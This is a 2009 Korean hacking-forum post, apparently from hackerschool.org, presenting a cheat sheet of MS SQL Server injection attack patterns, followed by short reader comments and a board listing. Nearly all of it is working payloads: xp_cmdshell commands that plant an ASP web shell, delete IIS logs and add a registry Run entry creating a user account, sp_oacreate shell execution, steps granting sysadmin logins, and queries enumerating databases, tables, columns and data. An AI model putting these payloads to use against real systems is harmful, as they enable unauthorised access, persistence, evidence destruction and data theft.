1580, 3/79 회원가입  로그인  
   subroutine
   http://blog.naver.com/31337__
   sql 인젝션 공격기법

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1177 [복사]


#########################################
# SQL Injection에 의해 자주 생성되는 테이블 명
#########################################
D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt,  jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN



########################################
# CHECK
#########################################

and 1=(select @@version) //version

and 1=(IS_SRVROLEMEMBER('sysadmin')) // 전체 권한(sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin)
and 1=(IS_MEMBER('db_owner')) // 해당 DB 권한

;declare @a int;--  // 사용여부
and 0<>db_name() // DB명
and user>0 // USER명

#########################################
# 중국 해커들이 애용하는 공격패턴
#########################################

;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- // File
;exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt' // LOG
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add' // Registry

DROP TABLE kill_kk;CREATE TABLE kill_kk(subdirectory VARCHAR(100)윕
depth VARCHAR(100)윕[file] VARCHAR(100)) Insert kill_kk
exec master..xp_dirtree "D:/"윕 1윕1-- // Table 생성

DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

#########################################
# 공격 시나리오
#########################################

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 1 id,ResultTxt from [X_5450] order by [id]) T order by [id] desc)>0


;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;CREATE TABLE [X_5450]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_5450](ResultTxt) exec master.dbo.xp_cmdshell 'dir c:';insert into [X_5450] values ('g_over');exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addsrvrolemember dir c:,sysadmin"'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addlogin dir c:,xiaoxue"'--

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

#########################################
# 기타 쿼리문
#########################################

모든 db명 쿼리하기
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)

특정db에서 사용자가 만든 테이블명 불러오기
and 0<>(select top 1 name from snortids.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top 행증가 name from .dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

테이블의 컬럼정보 불러오기

특정 테이블고유ID 가져오기(char(97)+char(98)+char(99)=abc) 1061578820
and 0<>(select count(*) from snortids.dbo.sysobjects where xtype='U' and name=char(97)+char(99)+char(105)+char(100)+char(95)+char(101)+char(118)+char(101)+char(110)+char(116) and uid>(str(id)))

컬럼명 가져오기
and 0<>(select top 1 name from snortids.dbo.syscolumns where id=1061578820)
and 0<>(select top 1 name from (select top 행증가 name from snortids.dbo.syscolumns where id=1061578820 order by name asc) as table1 order by name desc)

데이터 가져오기
and 0<>(select top 1 char(94)+Cast(sig_name as varchar(8000))+char(94) from SnortIDS..acid_event)
and 0<>(select top 1 char(94)+Cast(컬럼명 as varchar(8000))+char(94) from SnortIDS..acid_event where 컬럼명 not in('이미얻은내용'))
and 0<>(select top 1 char(94)+Cast(컬럼명 as varchar(8000))+char(94) from (select top 행수 컬럼명 from SnortIDS.dbo.acid_event order by 컬럼명 asc) as table1 order by 컬럼명 desc)

-subroutine-

  Hit : 18468     Date : 2009/01/11 01:52



    
BHM D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt, jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN -- 대부분이 阿D,NB 란 툴에서 생성된 테이블명이군...쩝쩝
2009/01/19  
zhuji90 무슨 언어인가요...? 2009/02/09  
팬더고은 ㅇㅅㅇ..신기하네요 2009/07/10  
xodnr631 살짝 읽을만 하네요, 감사합니다. 2010/09/24  
1540   [자작] ssh / sftp 사용법 정리 (포트설정시)[1]     soohosin
02/15 20767
1539   D.H 의 HTML 강의 (1) 해킹의 기초[13]     DH_ 99
10/12 20469
1538   [자작]해킹하는데 C언어는 필요한가     dontknow
07/23 20454
1537   어셈블리어 강좌 5편     asdzxc301
12/13 20333
1536   해킹당한 서버에서 확인해야할일[9]     소유
09/21 19863
1535   cmos비밀번호 푸는 방법[25]     idl0521
12/29 19690
1534   [연습용 C자작] 스도쿠 소스[5]     Ilios
05/24 19644
1533   패스워드 알아내기 1[15]     geniusevil
12/15 19475
1532   [C기초] 12 - 삼항연산자(3항연산자)     sihun1113
05/01 19417
1531   어셈블리어 총정리 강좌     asdzxc301
12/13 19309
1530   네트워크 개념 휘어잡기 1[24]     소유
09/10 18986
1529   [펌] 리눅스 job, bg, fg에 관한 고찰[1]     qpt0707
04/06 18759
1528   좋은 비밀번호란???[24]     소유
09/04 18759
  sql 인젝션 공격기법[4]     subroutine
01/11 18467
1526   [c언어] 문자열을 입력받아 거꾸로 출력하기[8]     H.R.T
12/15 18309
     [공지] 강좌를 올리실 때는 말머리를 달아주세요^ㅡ^ [29] 멍멍 02/27 18274
1524   C언어로 만든 그래픽 프로그램[11]     승리의박성환
04/22 18249
1523   유치원 만화 크게보기[11]     소유
09/03 18050
1522   [자작] 한번 분석해본 보이스채팅 프로그램.[7]     푸른하늘
08/23 18033
1521   해커스랩 레벨 0 깨는 방법 - 시작하기[22]     불사
05/21 17780
[1][2] 3 [4][5][6][7][8][9][10]..[79]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com